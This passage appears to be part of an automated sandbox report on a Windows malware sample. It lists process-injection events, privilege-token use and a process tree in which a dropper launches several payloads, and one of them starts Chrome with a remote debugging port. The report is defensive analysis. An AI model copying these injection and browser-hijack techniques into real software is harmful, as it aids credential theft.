N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2808 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
PID 2808 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
PID 2808 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
PID 4632 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4632 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4632 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2808 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
PID 2808 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
PID 2808 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
PID 3116 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3116 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3116 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3116 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 3116 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 3116 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 3116 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 3116 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 3116 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 4448 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe
PID 4448 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe
PID 4448 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe
PID 1700 wrote to memory of 2820 N/A C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe
PID 1700 wrote to memory of 2820 N/A C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe
PID 1700 wrote to memory of 2820 N/A C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe
PID 2820 wrote to memory of 2192 N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
PID 2820 wrote to memory of 2192 N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
PID 2820 wrote to memory of 2192 N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
PID 2192 wrote to memory of 316 N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 316 N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 316 N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 3116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 3116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 2192 wrote to memory of 316 N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
PID 3116 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
PID 3116 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
PID 3116 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe
PID 3116 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe
PID 1196 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1196 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 1128 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 1128 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe

"C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3996 -ip 3996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 948

C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"

C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=764 -burn.filehandle.self=808

C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe

C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1700 -ip 1700

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 860

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1700 -ip 1700

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 756

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"

C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe

"C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff85288cc40,0x7ff85288cc4c,0x7ff85288cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2128 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2272 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3924,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3928,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3892,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4556,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4492 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5076,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4736 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4896 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4692,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4852 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

